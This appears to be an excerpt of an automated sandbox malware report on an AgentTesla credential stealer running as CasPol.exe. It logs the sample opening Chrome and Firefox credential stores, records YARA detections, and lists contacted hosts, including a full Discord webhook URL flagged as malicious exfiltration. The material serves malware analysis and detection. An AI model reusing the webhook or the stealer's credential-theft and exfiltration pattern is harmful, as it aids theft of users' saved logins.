Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
64.185.227.155
 api4.ipify.org United States
18450 WEBNXUS false
162.159.135.232
 discord.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
discord.com 162.159.135.232 true
api4.ipify.org 64.185.227.155 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr true
    • Avira URL Cloud: safe
    		 unknown